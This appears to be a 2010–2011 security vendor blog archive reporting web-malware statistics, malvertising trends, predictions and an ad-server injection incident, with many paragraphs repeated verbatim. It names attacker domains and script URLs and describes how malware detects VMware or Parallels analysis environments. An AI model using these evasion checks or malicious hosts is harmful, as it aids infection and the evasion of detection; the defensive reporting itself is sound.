According to various sources, a website operated by Nasdaq was compromised and infected with web based malware. Reports of the attack surfaced last week. The target of this attack are the roughly 10,000 executives that use the Nasdaq information portal Directors Desk. It appears that attackers were able to inject drive-by-download malware onto the website. Although sources familiar with the matter claim that the exchange’s trading platforms were not affected, the risks of this attack are nonetheless very high. Visitors to the website would have been exposed to malware which could at a later time log their keystrokes and steal passwords to sensitive trading accounts or other information.
Monday, February 7, 2011
Thursday, December 23, 2010
Fast Forward: Dasient's Security Predictions for 2011
As we wrap up 2010 and reflect on some of the major security headlines of the year - Aurora, Zeus, WikiLeaks, Stuxnet - it's hard to look at 2011 without wondering how much worse it will get before it gets better. The reality is that cybercriminals are innovative, creative, and fast. We need to do better as a community to counter the threat they pose to our organizations and to the Internet as a whole. Following are Dasient's Top 5 Security Predictions for 2011:
1) There will be a large botnet cyber war that Zeus will end up winning. Zeus will hold its ground against other botnets that try and attack it. Botnets have been around for over a decade, but have evolved significantly since Tribe Flood Network (TFN), Trin00 and similar tools that were used to attack Amazon, Yahoo, and E*Trade in 2000. While only thousands of clients were used to cripple large web sites 10 years ago, the size of botnets have expanded to hundreds of thousands or millions of clients, have become multi-application (e.g., are used to send email spam, and do keystroke logging in addition to DDoS), and the growth of botnets has utilized more and more automated technology. Compromised machines that make up botnets have become a commodity, and while there are still lots of vulnerable, uncompromised machines that are available for the taking, attackers will eventually start to “butt-heads.” While there has been some early indications that attackers have patched machines that they have infected to prevent other attackers from stealing their infected machines, 2011 will likely be the year that large botnets will start more aggressively competing to sustain their growth, and users will get caught in the middle. Zeus has proven its ability to grow to sizes more significant than other botnets, and is also one of the more profitable botnets that targets financial institutions. We expect to see a botnet cyberwar in 2011, and predict that Zeus will come out on top.
2) Human mules will be replaced by malware that do the equivalent job of transferring balances between bank accounts using keystroke-logged credentials. Today, once user credentials such as bank account usernames and passwords are logged on compromised client machines, those credentials are shipped off to botmaster servers, aggregated, and provided to human mules. The human mules most often don’t know they are mules, but think they are doing “work-at-home” types of jobs in which part of their job responsibility is to make monetary transfers between bank accounts. In 2010, we saw some significant arrests of hundreds of such human mules. Just as system architects work to eliminate points of failure when building resilient systems, the cybercriminals will do the same for their operations. If human mules can be arrested and can get in the way of transferring money from the stolen accounts to the cybercriminal’s accounts, they’ll replace the humans with additional malware for that purpose. Writing software to automatically make transfers betweeen bank accounts does require good coding, management of session data, and other such technical details, but can be done rather simply with today's attack and automation tools. As such, like many areas of businesses today, humans will be taken “out-of-the-loop” to scale cybercriminal operations.
3) We’ll see the first significant HTML 5 abuses. The HTML5 standard has been in development for some time, and every major browser now includes some support for it. Some of the features include local browser storage in which web sites will be able to store more than just cookies on your machine, and support for inline videos without requiring third-party plug-ins such as Flash. With any new functionality comes increased attack surface, and the same will be true for HTML5. We expect to see things like malware authors stuffing malicious code into the local browser storage provided by HTML 5 and then executed via a browser vulnerability. In addition, as HTML 5 has native video tags, we expect to see zero-size video tags used to inject web-based malware, just as we see zero-size IFRAMES used today to do the same. As HTML5 implementations will be at their newest, cybercriminals will leverage bugs in the early implementations tospread malware.
4) Advanced IM threats will increase and be directed at the use of webcams and audio. Attackers have been using malware to do keystroke logging for years, but as the number of standard input devices on machines increase, so will the attackers' interest in them. Most PCs have built-in microphones, and while there has been some malware that automatically turns on and captures audio and video from these devices, we expect that webcam-logging and audio-logging will become just as popular as keystroke-logging. Malware authors will use the additional logging to build more “ransom-ware” in which they record sensitive conversations and pictures, and will then demand a ransom from individuals and companies by threatening to release the sensitive media onto the Internet or disclose to interested parties if the ransom is not paid.
5) As the use of social media web sites continues to grow, drive-by-downloads and rogue anti-virus will be used more aggressively on platforms such as Facebook and Twitter. This is evidenced by threats such as the Koobface botnet that continually targets Facebook, as well as the September XSS attack that targeted Twitter and
redirected users to porn and malware sites.
1) There will be a large botnet cyber war that Zeus will end up winning. Zeus will hold its ground against other botnets that try and attack it. Botnets have been around for over a decade, but have evolved significantly since Tribe Flood Network (TFN), Trin00 and similar tools that were used to attack Amazon, Yahoo, and E*Trade in 2000. While only thousands of clients were used to cripple large web sites 10 years ago, the size of botnets have expanded to hundreds of thousands or millions of clients, have become multi-application (e.g., are used to send email spam, and do keystroke logging in addition to DDoS), and the growth of botnets has utilized more and more automated technology. Compromised machines that make up botnets have become a commodity, and while there are still lots of vulnerable, uncompromised machines that are available for the taking, attackers will eventually start to “butt-heads.” While there has been some early indications that attackers have patched machines that they have infected to prevent other attackers from stealing their infected machines, 2011 will likely be the year that large botnets will start more aggressively competing to sustain their growth, and users will get caught in the middle. Zeus has proven its ability to grow to sizes more significant than other botnets, and is also one of the more profitable botnets that targets financial institutions. We expect to see a botnet cyberwar in 2011, and predict that Zeus will come out on top.
2) Human mules will be replaced by malware that do the equivalent job of transferring balances between bank accounts using keystroke-logged credentials. Today, once user credentials such as bank account usernames and passwords are logged on compromised client machines, those credentials are shipped off to botmaster servers, aggregated, and provided to human mules. The human mules most often don’t know they are mules, but think they are doing “work-at-home” types of jobs in which part of their job responsibility is to make monetary transfers between bank accounts. In 2010, we saw some significant arrests of hundreds of such human mules. Just as system architects work to eliminate points of failure when building resilient systems, the cybercriminals will do the same for their operations. If human mules can be arrested and can get in the way of transferring money from the stolen accounts to the cybercriminal’s accounts, they’ll replace the humans with additional malware for that purpose. Writing software to automatically make transfers betweeen bank accounts does require good coding, management of session data, and other such technical details, but can be done rather simply with today's attack and automation tools. As such, like many areas of businesses today, humans will be taken “out-of-the-loop” to scale cybercriminal operations.
3) We’ll see the first significant HTML 5 abuses. The HTML5 standard has been in development for some time, and every major browser now includes some support for it. Some of the features include local browser storage in which web sites will be able to store more than just cookies on your machine, and support for inline videos without requiring third-party plug-ins such as Flash. With any new functionality comes increased attack surface, and the same will be true for HTML5. We expect to see things like malware authors stuffing malicious code into the local browser storage provided by HTML 5 and then executed via a browser vulnerability. In addition, as HTML 5 has native video tags, we expect to see zero-size video tags used to inject web-based malware, just as we see zero-size IFRAMES used today to do the same. As HTML5 implementations will be at their newest, cybercriminals will leverage bugs in the early implementations tospread malware.
4) Advanced IM threats will increase and be directed at the use of webcams and audio. Attackers have been using malware to do keystroke logging for years, but as the number of standard input devices on machines increase, so will the attackers' interest in them. Most PCs have built-in microphones, and while there has been some malware that automatically turns on and captures audio and video from these devices, we expect that webcam-logging and audio-logging will become just as popular as keystroke-logging. Malware authors will use the additional logging to build more “ransom-ware” in which they record sensitive conversations and pictures, and will then demand a ransom from individuals and companies by threatening to release the sensitive media onto the Internet or disclose to interested parties if the ransom is not paid.
5) As the use of social media web sites continues to grow, drive-by-downloads and rogue anti-virus will be used more aggressively on platforms such as Facebook and Twitter. This is evidenced by threats such as the Koobface botnet that continually targets Facebook, as well as the September XSS attack that targeted Twitter and
redirected users to porn and malware sites.
Monday, November 22, 2010
Dasient Q3 Malware Update: Web-Based Malware Infections Double Since Last Year, Malvertising Attacks Continue Over Summer
In Q3 Dasient continued to monitor millions of sites on the Internet for web-based malware infections and malvertisements. Based on the data gathered, we estimate that in Q3 over 1.2 million web sites across the Internet were infected, which is double our estimate from exactly one year ago (see Figure 1 below). The web malware problem continues to grow dramatically as an increasing number of legitimate sites are getting infected.
Looking at the major modes of communication used on the Internet, email was one of the first such major mode of communication, and we saw attackers take advantage of it by distributing viruses as email attachments. Over time, we saw that email became web-based with services such as Hotmail, Yahoo! Mail, and Gmail, and such services had to incorporate anti-virus software on their servers to scan email attachments for malware. As web page views continued to increase and web pages themselves became more and more interactive via Web 2.0 trends, cybercriminals took advantage of the advent of drive-by-download techniques to infect users without requiring the opening of attachments, thereby allowing them to exploit web pages as an increasingly pervasive malware distribution platform.
While attackers continue to grow their use of almost every tool at their disposal (including spreading viruses via email attachment) and as the cybercriminal economy continues to thrive, our research indicates that the use of drive-by-downloads and rogue anti-virus schemes eclipse other modes of malware distribution.
As we approach 2011, we predict that as the usage specifically of social media web sites continues to grow, drive-by-downloads and rogue anti-virus will be used more aggressively on platforms such as Facebook and Twitter, as evidenced by threats such as the Koobface botnet that continually targets Facebook and the September XSS attack that targeted Twitter and redirected users to porn and malware sites. The Koobface authors, for instance, have built “attack modules” for several social media networks including Facebook, MySpace, Twitter, Hi5, Bebo, and Friendster. These attack modules are used to automatically post comment spam with malicious links and distribute fake anti-virus software to users of each of the different social media networks.
Looking at the major modes of communication used on the Internet, email was one of the first such major mode of communication, and we saw attackers take advantage of it by distributing viruses as email attachments. Over time, we saw that email became web-based with services such as Hotmail, Yahoo! Mail, and Gmail, and such services had to incorporate anti-virus software on their servers to scan email attachments for malware. As web page views continued to increase and web pages themselves became more and more interactive via Web 2.0 trends, cybercriminals took advantage of the advent of drive-by-download techniques to infect users without requiring the opening of attachments, thereby allowing them to exploit web pages as an increasingly pervasive malware distribution platform.
While attackers continue to grow their use of almost every tool at their disposal (including spreading viruses via email attachment) and as the cybercriminal economy continues to thrive, our research indicates that the use of drive-by-downloads and rogue anti-virus schemes eclipse other modes of malware distribution.
As we approach 2011, we predict that as the usage specifically of social media web sites continues to grow, drive-by-downloads and rogue anti-virus will be used more aggressively on platforms such as Facebook and Twitter, as evidenced by threats such as the Koobface botnet that continually targets Facebook and the September XSS attack that targeted Twitter and redirected users to porn and malware sites. The Koobface authors, for instance, have built “attack modules” for several social media networks including Facebook, MySpace, Twitter, Hi5, Bebo, and Friendster. These attack modules are used to automatically post comment spam with malicious links and distribute fake anti-virus software to users of each of the different social media networks.
Figure 1. Web Malware Growth: Q3 2009 - Q3 2010
Large Government Agencies: Targets of Attack
Another interesting trend that we have observed is that larger and more well-known government agencies are being increasingly targeted by web-based malware infections. As per the table below, from 2008 to 2009, smaller and less-well-known government agency web sites were targeted, while from 2009 to 2010, agencies such as the National Institute of Health (NIH), the US Treasury, and the Environmental Protection Agency had their web sites infected.
| Site | Most Recent Infection | Monthly Page Views |
| National Institute of Health | October 2010 | 9,500,000 |
| US Treasury | May 2010 | 435,000 |
| EPA | March 2010 | 1,400,000 |
| Unemployment.gov | July 2009 | Unavailable |
| DC.gov | Feb 2009 | 250,000 |
| Govtrip.com | Feb 2009 | 9,000 |
| UsConsulate.gov | Dec 2008 | 90,000 |
Figure 2. Larger Government Web Sites Infected in 2010. (Monthly page view data obtained from Quantcast)
In previous quarters, we measured that re-infection rates (the probability that if a web site is infected once, it will be infected again) were high - on the order of 40%- and from the table below, we see that government web sites are no exception. The NIH web site has been infected and re-infected five times, with the most recent infection occurring this past October. In addition, the State of Alabama had their site infected and re-infected 37 times before they seemingly locked down the issue in July 2009.
| Site | Number of Times Infected | Last Infection |
| NIH.GOV | 5 | 10/2010 |
| CA.GOV | 3 | 8/2010 |
| AL.GOV | 37 | 07/2009 |
| DC.GOV | 16 | 02/2009 |
| WASHINGTONDC.GOV | 4 | 02/2009 |
Figure 3. Re-infection Occurrences for Government Web Sites.
Another interesting government-related malware threat emanated this quarter – Stuxnet a very high profile and highly sophisticated Trojan that was believed to be written by a nation state. Stuxnet has the ability to reprogram automation equipment that controls and monitors critical infrastructure, and has the capability to conduct sabotage with an impact that is yet to be determined. Stuxnet was written to target a Siemens Simatic factory system, and is suspected to have been written to target nuclear reactors in Iran.
While the cybercriminal economy has been using malware explicitly for profit, nation-states may very well be increasing their investments in malware with the intent of preparing for future cyber-warfare scenarios. While Stuxnet propagated via USB sticks, one can imagine that an efficient way to infect critical, government-run infrastructure would be to infect government web sites, which government employees access more often than casual visitors.
Malvertisements Served in Q3: 1.5M per day
In Q3 2010, we estimate that over 1.5 million malvertisements were served online per day including both drive-by-downloads and fake anti-virus campaigns. Also, our systems measured that the average lifetime of a malvertising campaign was 11.1 days, indicating that malvertisments continue to be an extremely effective means of malware distribution for cybercriminals.
Top 10 Attacker Top-Level-Domains (TLDs)
In Q3, our systems reported that the most popular attacker domains were .com, .ru, and .info, in order of decreasing popularity. As compared to last quarter, there were a few shifts in the origin of attacks based on the TLD of the attackers code: we saw .cn (China) drop and .ru (Russia) jump.
Figure 4. Attacker Domain TLDs.
Top 10 Attacker Domains
In Figure 5, we show the top 10 attacker domains responsible for drive-by-downloads in Q3. Three of the top domains are plays on domain names that contain the word “ads” which was not the case in previous quarters. Usage of such domain names can be indicative of two things: 1) Attackers know that many sites are dependent on their ads for revenue and are more hesitant to remove resources on the page that relate to their ad revenue sources. Any extra time that a webmaster debates removing a widget on the page related to an ad slot is more time that the web site is serving malware. 2) Attacker mindshare is turning more and more to ads. Even if these domains in particular were used to spread more traditional web-based malware attacks, an increased focus on malvertising may be just around the horizon.
Of the attacker domains in Figure 5, riotassistance.ru and nuttypiano.com used very similar attack pattern, and the same exploit kits were running on both domains. Other domains conducting similar attacks that were not included in top 10, but ranked highly from time-to-time in our infection library’s top 20 throughout the quarter include seamscreative.info and addonrock.ru.
Figure 5. Top Attacker Domains.
Top 10 Attacker URLs
The top 10 distinct attacker URLs which were responsible for serving malware are shown in Figure 6. Note that attacker domains in Figure 5 such as riotassistance. ru distribute their attack over 100 distinct URLs (e.g., riotassistance. ru/Java.js, riotassistance. ru/Debugger.js), and hence do not show up in the top 10 distinct attacker URL list even though the combined number of drive-bys conducted by them exceed the number of drive-bys by any one of the attacker URLs in Figure 5.
Figure 6. Top Attacker URLs.
Anti-Detection Techniques
Malware authors are continuing to deploy increasingly sophisticated attacks to evade detection. They know that the good guys try to run their malware in virtual machines such as VMWare and Parallels. As such, the malware authors have their malware do checks at run-time to determine if their malware might be under a microscope by security researchers or automated scanning engines.
We have a deep understanding of the types of checks that malware authors conduct, and report on some of the simple checks that we identified malware authors to be conducting. For instance, to check on whether or not the malware might be under scrutiny in a VMWare virtual machine, we have seen malware checks if a file by the name of vmhgfs.sys is present as a device driver under the Windows system directory. Or, to check whether or not the malware is being analyzed in Parallels, it checks for a device driver by the name of prleth.sys.
Other anti-detection mechanisms range from checking for running processes and loaded modules to verifying system BIOS information and counting the number of CPU cycles to execute blocks of code. While these are not new or advanced tactics, we are seeing them more often and earlier in the infection process.
Summary
Our Q3 Malware Update continues to show that websites are at an increasing risk of being compromised. Hackers are not only becoming smarter in finding new ways of spreading malware, the attacks themselves are also becoming more sophisticated and devastating. Without structurally protecting websites through monitoring, businesses and government organizations with an online presence are increasingly at a higher risk of being infected and of suffering the consequences. The sharp rise of social networking sites only expands the threat landscape and proper web security protection becomes a must.
Wednesday, September 22, 2010
Third party application infects a Quantcast 100 site
Last week we detected an infection on a Quantcast 100 publisher site which was due to a vulnerable, third-party ad server (We have also observed the same attack on 400 different sites since September 14). The exploit served from the infected page created two drive-by-downloads which infected users during a two-hour window. We were monitoring this site with our Anti-Malvertising (AMS) Service and identified the malware as soon as it hit the publisher site. Fortunately, the third-party provider was able to fix the infection quickly after being alerted.
The publisher site used a script tag to source in an external Javascript snippet. Normally, this third party script adds image tags to the publisher page. They use an ad server application to manage such images. The application keeps these image tags in the “zones” table in its database.
In this incident, the attackers successfully injected malicious javascript tags into the zones table by exploiting a vulnerability found in the ad server versions before 2.8.7. When the users visited the publisher site, they received the image tags as well as the malicious javascript tags which silently downloaded a Java virtual machine exploit (CVE-2009-3867, CVE-2010-0886) to install two drive-by-downloads on the user’s computer.
More information about the attack can be found at these links:
http://blog.openx.org/09/security-update-how-to-secure-your-openx-installation/
http://blog.sucuri.net/2010/09/openx-users-time-to-upgrade.html
As we reported in the Q2 malware update, 75% of web sites uses external, third-party JavaScript widgets, 42% of web sites use third-party ad-related resources and 91% of web sites use third-party applications, and/or out-of-date software. In this attack, the third party application was compromised that led to the infection of the publisher site. In other words, a structural vulnerability on the publisher site was exploited. Traditional signature-based approaches, which have very low (or zero) detection of these drive-by-downloads, fail to prevent thousands of users from getting infected. Therefore we keep on emphasizing how important it is to use behavioral approaches, and to monitor ads as well as all kinds of third party content (including widgets) on websites.
The publisher site used a script tag to source in an external Javascript snippet. Normally, this third party script adds image tags to the publisher page. They use an ad server application to manage such images. The application keeps these image tags in the “zones” table in its database.
In this incident, the attackers successfully injected malicious javascript tags into the zones table by exploiting a vulnerability found in the ad server versions before 2.8.7. When the users visited the publisher site, they received the image tags as well as the malicious javascript tags which silently downloaded a Java virtual machine exploit (CVE-2009-3867, CVE-2010-0886) to install two drive-by-downloads on the user’s computer.
More information about the attack can be found at these links:
http://blog.openx.org/09/security-update-how-to-secure-your-openx-installation/
http://blog.sucuri.net/2010/09/openx-users-time-to-upgrade.html
As we reported in the Q2 malware update, 75% of web sites uses external, third-party JavaScript widgets, 42% of web sites use third-party ad-related resources and 91% of web sites use third-party applications, and/or out-of-date software. In this attack, the third party application was compromised that led to the infection of the publisher site. In other words, a structural vulnerability on the publisher site was exploited. Traditional signature-based approaches, which have very low (or zero) detection of these drive-by-downloads, fail to prevent thousands of users from getting infected. Therefore we keep on emphasizing how important it is to use behavioral approaches, and to monitor ads as well as all kinds of third party content (including widgets) on websites.
Tuesday, September 14, 2010
Continued growth in web-based malware attacks -- over 1M web sites infected in Q2 2010
It’s time again for our quarterly web-based malware update. We’ve pulled the Q2 data from our telemetry systems that monitor millions of web sites daily, producing the data and forensics that allow us to extrapolate infection rates across the entire Internet. This quarter marks a significant spike in the number of infected websites - almost double the number of the previous quarter. Hackers have been very busy and are constantly coming up with new attacks. It’s therefore not surprising that our infection library has catalogued almost 200,000 different infections - up 58,000 from the previous quarter. Here are the details:
Over 1M Web Sites Infected
In Q2 2010, we estimate that 1.3 million web sites were infected, based on data from our telemetry systems. Q2 was the first quarter in history for which we believe that over one million web sites were infected in a three month time period. As we have now been tracking web-based malware statistics for four quarters, we have plotted the estimated number of infected web sites over that time period below. While there was a slight dip in Q4 ‘09 (looks like some cybercriminals took part of the holiday season off just like the rest of us), the growth over the past couple quarters has been significant -- growth by a factor of two over the past year. We should note that while the measured growth below is mostly due to increased activity on the part of cybercriminals, a part of it is due to improvements to the methodology and number of sites monitored by our telemetry.
In addition to trends that we gathered on web-based malware in general, we also studied trends in the more specific area of malvertising. Over all of Q2, based on the part of our telemetry that monitors dozens of ad networks, we estimate that over 1.6 million malvertisements are served on an average day, which represents an approximate increase of just over 20% from an estimate that we produced in mid-Q2. In addition, the average lifetime of a malvertising campaign was 11.5 days, an increase of over 50% from a measurement that we did in mid Q2. Kicking off malvertising campaigns on weekends gives cybercriminals a couple extra days of lifetime as IT teams often don’t get to look in depth into attacks over the weekends (unless they have automated solutions in place such as Dasient’s anti-malvertising service), and the intermittent nature with which malvertising creatives are served makes them harder to track and lock down contributing to the lifetime of the malvertising campaigns.
We observed that malvertising attacks have a high propensity for being launched closer to weekends, as per the graph below. Fridays and Saturdays were the most common days for the launch of malvertising attacks. Thursdays came in next, with Sunday following. Cybercriminals know that corporate IT teams are slower to respond due to weekend attacks, so they launch their attacks on and near the weekends to maximize the impact of their attack. Big money can be made via Fake Anti-Virus operations -- see the eWeek article at http://www.eweek.com/c/a/Security/3-Indicted-in-100-Million-Rogue-AntiVirus-Operation-696172/ for an example where over $100M was minted by the cybercriminals -- so every minute that the attack is live is critical.
Underlying Issue: Structural Vulnerabilities
The structural vulnerabilities research report that we issued this past July just prior to the BlackHat 2010 security conference highlighted the multitude of attack vectors that cybercriminals have at their disposal, and it appears that they are taking advantage of them. Structural vulnerabilities are ones in which a web site relies on third-party resources as part of the composition of the site, and when third-party resources get targeted or compromised, so do all the web sites that use those resources. Our key focus in this malware update is reviewing Q2 malware statistics, but we briefly review some of our findings from our structural vulnerabilites report that underlie the acceleration of the spread of web-based malware, while providing some new concrete examples:
* 75% of web sites uses external, third-party JavaScript widgets. Traffic and audience measurement widgets, for instance, are popular choices as targets. Forty-three percent of the top Alexa 100,000 web sites use widgets such as Google Analytics and JQuery (as per Stanford University research presented at this past July’s BlackHat security conference in Las Vegas). While we have thus far not yet seen a mass compromise due to widgets, such an attack, say via DNS cache poisoning against a popular ISP is not simply a theoretical possibility (see http://www.digitalsanctuary.com/tech-blog/security/att-dns-cache-poisoning.html). Every web site that uses these widgets can become a malware distribution vehicle, with users getting infected simply when they load web sites from such pages, when these attacks occur. Note also that in cases where DNS cache poisoning is used, the widget provider does not need to be compromised – only the ISPs do.
* 42% of web sites use third-party ad-related resources. Financial web sites are just as likely as the average web site to use ad-related resources, often to manage their own in-house ads and/or show third-party ads on auxiliary sites that they run in which users can give each other financial advice or on other user-generated-content offerings they make available. Publisher sites are twice as likely to show third-party ads than the average web site, and there has been an uptick in malvertising attacks this year.
* 91% of web sites use third-party applications, and/or out-of-date software. It has been known for some time that keeping client-side software patched has been a challenge, but keeping software on servers patched is just as hard or even harder. Upgrading server-side software, whether it be the version of the web server, the application server, language modules such as (PHP, ASP.NET, etc), or web applications can require porting of data and code and is often a non-trivial exercise and doesn’t get done in a very timely fashion. As cybercriminals can just easily lookup all the known security vulnerabilities for such server-side software and use available exploit kits, web sites using old or out-of-date server-side software can be turned into distribution vehicles for malware by exploiting known vulnerabiliites.
Infection Library Growth
During Q2, Dasient’s automated systems added over 58,000 unique entries to its infection library. Unlike the infection libraries of traditional anti-virus companies, Dasient’s infection library catalogs web-based code snippets that cybercriminals inject and use to compromise web sites and ad networks. In Q2, over 43,000 JavaScripts and over 15,000 IFRAMEs were added to Dasient’s infection library. As a percentage of the total number of new entires, JavaScript samples have increased by 19%, and JavaScript samples now make up 74% of the entries for the quarter (as compared to 55% three quarters ago).
Why use JavaScripts instead of IFRAMEs? JavaScripts have some advantages from the standpoint of an attacker. Most significantly, JavaScripts have access to the DOM elements in the rest of the page, thereby giving attackers more information and more capability to “muck” with the page. For example, an injected JavaScript has access to the page referrer, the URL address bar, the user’s cookie, and has the ability to write new, potentially malicious content into the web page. Scripts sourced in via IFRAMEs, by comparison, do not have the capability to access or communicate with the rest of the page.
Top Attacker Domains and Top-Level-Domains (TLDs)
As a part of our look into our growing infection library, we studied the most frequently occuring attacker domains used in SRC fields in malicious JavaScripts and IFRAMEs, as shown in the graphs below. Attackers seem to use more .com domains in aggregate as they want their domain name to seem as “legitimate” as possible and Chinese domain names tend to arouse suspicion. While the cybercriminal community seems to be using more .com domains in aggregate, specific .cn domains (such as the ones listed in the chart below) are more frequently used than their .com counterparts. We see that some of the domain names end in .com.cn (as in ustocn. com. cn), which have been accounted for as .cn domains in our study but seek to look more legitimate, as domains that have a .com followed by a country code are used by may legitimate organizations in many countries.
We also looked at just the top-level-domains (TLDs) that attackers used. From the chart below compared to similar statistics from Q1 2010, we see that the attackers are using significantly more .info domains that in the previous quarter. In Q1, .info domains took a backseat to .net, .org, and .ru domains, but has jumped ahead of all those TLDs in Q2.
Drive-By Naming and Locations
When attackers send drive-by-downloads, they seem to like to choose one letter file names and innocent looking names like updates.exe and file.exe. Sometimes the file name starts with MS to imitate Microsoft processes. There are also a class of attacks that choose a random file name with fixed number of characters.
Temp and application data folders are the favorite choice of folders in which to store malicious executables. However, executables are sometimes copied to system directory after their initial storage, and run from there.
Overall, three out of four drive-by-downloads have one letter filenames and are written to the User’s Application Data directory.
Summary / Conclusion:
To summarize, some of the most interesting statistics from our Q2 malware update are:
* We estimate that 1.3 million web sites were infected in Q2 2010 (almost a 2x jump as compared to Q1)
* We estimate that for Q2, on average 1.6 million malvertisements were served on a daily basis.
Keep your sites safe!
Your Dasient Team
Over 1M Web Sites Infected
In Q2 2010, we estimate that 1.3 million web sites were infected, based on data from our telemetry systems. Q2 was the first quarter in history for which we believe that over one million web sites were infected in a three month time period. As we have now been tracking web-based malware statistics for four quarters, we have plotted the estimated number of infected web sites over that time period below. While there was a slight dip in Q4 ‘09 (looks like some cybercriminals took part of the holiday season off just like the rest of us), the growth over the past couple quarters has been significant -- growth by a factor of two over the past year. We should note that while the measured growth below is mostly due to increased activity on the part of cybercriminals, a part of it is due to improvements to the methodology and number of sites monitored by our telemetry.
In addition to trends that we gathered on web-based malware in general, we also studied trends in the more specific area of malvertising. Over all of Q2, based on the part of our telemetry that monitors dozens of ad networks, we estimate that over 1.6 million malvertisements are served on an average day, which represents an approximate increase of just over 20% from an estimate that we produced in mid-Q2. In addition, the average lifetime of a malvertising campaign was 11.5 days, an increase of over 50% from a measurement that we did in mid Q2. Kicking off malvertising campaigns on weekends gives cybercriminals a couple extra days of lifetime as IT teams often don’t get to look in depth into attacks over the weekends (unless they have automated solutions in place such as Dasient’s anti-malvertising service), and the intermittent nature with which malvertising creatives are served makes them harder to track and lock down contributing to the lifetime of the malvertising campaigns.
We observed that malvertising attacks have a high propensity for being launched closer to weekends, as per the graph below. Fridays and Saturdays were the most common days for the launch of malvertising attacks. Thursdays came in next, with Sunday following. Cybercriminals know that corporate IT teams are slower to respond due to weekend attacks, so they launch their attacks on and near the weekends to maximize the impact of their attack. Big money can be made via Fake Anti-Virus operations -- see the eWeek article at http://www.eweek.com/c/a/Security/3-Indicted-in-100-Million-Rogue-AntiVirus-Operation-696172/ for an example where over $100M was minted by the cybercriminals -- so every minute that the attack is live is critical.
Underlying Issue: Structural Vulnerabilities
The structural vulnerabilities research report that we issued this past July just prior to the BlackHat 2010 security conference highlighted the multitude of attack vectors that cybercriminals have at their disposal, and it appears that they are taking advantage of them. Structural vulnerabilities are ones in which a web site relies on third-party resources as part of the composition of the site, and when third-party resources get targeted or compromised, so do all the web sites that use those resources. Our key focus in this malware update is reviewing Q2 malware statistics, but we briefly review some of our findings from our structural vulnerabilites report that underlie the acceleration of the spread of web-based malware, while providing some new concrete examples:
* 75% of web sites uses external, third-party JavaScript widgets. Traffic and audience measurement widgets, for instance, are popular choices as targets. Forty-three percent of the top Alexa 100,000 web sites use widgets such as Google Analytics and JQuery (as per Stanford University research presented at this past July’s BlackHat security conference in Las Vegas). While we have thus far not yet seen a mass compromise due to widgets, such an attack, say via DNS cache poisoning against a popular ISP is not simply a theoretical possibility (see http://www.digitalsanctuary.com/tech-blog/security/att-dns-cache-poisoning.html). Every web site that uses these widgets can become a malware distribution vehicle, with users getting infected simply when they load web sites from such pages, when these attacks occur. Note also that in cases where DNS cache poisoning is used, the widget provider does not need to be compromised – only the ISPs do.
* 42% of web sites use third-party ad-related resources. Financial web sites are just as likely as the average web site to use ad-related resources, often to manage their own in-house ads and/or show third-party ads on auxiliary sites that they run in which users can give each other financial advice or on other user-generated-content offerings they make available. Publisher sites are twice as likely to show third-party ads than the average web site, and there has been an uptick in malvertising attacks this year.
* 91% of web sites use third-party applications, and/or out-of-date software. It has been known for some time that keeping client-side software patched has been a challenge, but keeping software on servers patched is just as hard or even harder. Upgrading server-side software, whether it be the version of the web server, the application server, language modules such as (PHP, ASP.NET, etc), or web applications can require porting of data and code and is often a non-trivial exercise and doesn’t get done in a very timely fashion. As cybercriminals can just easily lookup all the known security vulnerabilities for such server-side software and use available exploit kits, web sites using old or out-of-date server-side software can be turned into distribution vehicles for malware by exploiting known vulnerabiliites.
Infection Library Growth
During Q2, Dasient’s automated systems added over 58,000 unique entries to its infection library. Unlike the infection libraries of traditional anti-virus companies, Dasient’s infection library catalogs web-based code snippets that cybercriminals inject and use to compromise web sites and ad networks. In Q2, over 43,000 JavaScripts and over 15,000 IFRAMEs were added to Dasient’s infection library. As a percentage of the total number of new entires, JavaScript samples have increased by 19%, and JavaScript samples now make up 74% of the entries for the quarter (as compared to 55% three quarters ago).
| Q2 2010 | Increase/Decrease (as a percentage of total) | ||
| JavaScript injections | 74% | + 19% | |
| IFRAME Injections | 26% | - 11% |
Why use JavaScripts instead of IFRAMEs? JavaScripts have some advantages from the standpoint of an attacker. Most significantly, JavaScripts have access to the DOM elements in the rest of the page, thereby giving attackers more information and more capability to “muck” with the page. For example, an injected JavaScript has access to the page referrer, the URL address bar, the user’s cookie, and has the ability to write new, potentially malicious content into the web page. Scripts sourced in via IFRAMEs, by comparison, do not have the capability to access or communicate with the rest of the page.
Top Attacker Domains and Top-Level-Domains (TLDs)
As a part of our look into our growing infection library, we studied the most frequently occuring attacker domains used in SRC fields in malicious JavaScripts and IFRAMEs, as shown in the graphs below. Attackers seem to use more .com domains in aggregate as they want their domain name to seem as “legitimate” as possible and Chinese domain names tend to arouse suspicion. While the cybercriminal community seems to be using more .com domains in aggregate, specific .cn domains (such as the ones listed in the chart below) are more frequently used than their .com counterparts. We see that some of the domain names end in .com.cn (as in ustocn. com. cn), which have been accounted for as .cn domains in our study but seek to look more legitimate, as domains that have a .com followed by a country code are used by may legitimate organizations in many countries.
We also looked at just the top-level-domains (TLDs) that attackers used. From the chart below compared to similar statistics from Q1 2010, we see that the attackers are using significantly more .info domains that in the previous quarter. In Q1, .info domains took a backseat to .net, .org, and .ru domains, but has jumped ahead of all those TLDs in Q2.
Attacker Domain TLDs for Q2 2010
For Q1 2010
Drive-By Naming and Locations
When attackers send drive-by-downloads, they seem to like to choose one letter file names and innocent looking names like updates.exe and file.exe. Sometimes the file name starts with MS to imitate Microsoft processes. There are also a class of attacks that choose a random file name with fixed number of characters.
Temp and application data folders are the favorite choice of folders in which to store malicious executables. However, executables are sometimes copied to system directory after their initial storage, and run from there.
Overall, three out of four drive-by-downloads have one letter filenames and are written to the User’s Application Data directory.
Summary / Conclusion:
To summarize, some of the most interesting statistics from our Q2 malware update are:
* We estimate that 1.3 million web sites were infected in Q2 2010 (almost a 2x jump as compared to Q1)
* We estimate that for Q2, on average 1.6 million malvertisements were served on a daily basis.
* Most malvertising attacks are launched on weekends. Average lifetime for a malvertising campaign is 11.5 days.
* Our infection library grew by 58K entries, with relatively more JavaScript injections as compared to IFRAMEs in previous quarters
* Attackers use .com and .cn domains most frequently to host malicious code. There has been a rise in .info domains being infected and used to host malicious code.
* Three out of four drive-by-downloads have one letter filenames and are written to the User’s Application Data directory. The most common name for a drive-by-download was f.exe.
Hackers are going to continue to become more sophisticated. The malware epidemic is not slowing down - on the contrary, it’s exploding. Now is the time for businesses to educate themselves on how they can put safe security practices in place for their websites to protect their customers, their brand and their revenue. The first step is to make sure they are not exposed by monitoring their websites for malware regularly.
